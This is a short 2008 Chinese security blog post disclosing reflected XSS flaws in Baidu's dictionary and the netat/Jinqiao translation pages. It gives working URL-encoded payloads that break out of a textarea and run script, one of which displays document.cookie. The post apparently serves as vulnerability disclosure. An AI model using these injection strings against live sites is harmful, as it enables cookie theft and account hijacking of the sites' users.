首页 > 网络安全 > baidu and netat dict XSS

baidu and netat dict XSS

2008年10月17日 发表评论 阅读评论

百度词典:http://dict.baidu.com/
刚开始我没注意地址栏,原来是用的金桥的编译功能。

http://baidu.netat.net/trans.php?sen=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Fby%2520woyigui%2F%29%3C%2Fscript%3E%3Ctextarea%3E

这样的话,我们来跨金桥主站的:

http://trans.netat.net/index.php?from_content=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Fby%2520woyigui%2F%29%3C%2Fscript%3E%3Ctextarea%3E
http://trans.netat.net/index.php?from_content=%3C%2Ftextarea%3E%3Cscript%3Ealert%28document%2Ecookie%29%3C%2Fscript%3E%3Ctextarea%3E


呵呵。成功!

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:baidu and netat dict XSS
本文地址:http://www.woyigui.cn/2008/10/17/baidu-netat-dict-xss/

分类: 网络安全 标签:
  1. salors
    2008年10月17日09:05 | #1
    回复 | 引用

    貌似都不关心这个…

    [回复]

  1. 本文目前尚无任何 trackbacks 和 pingbacks.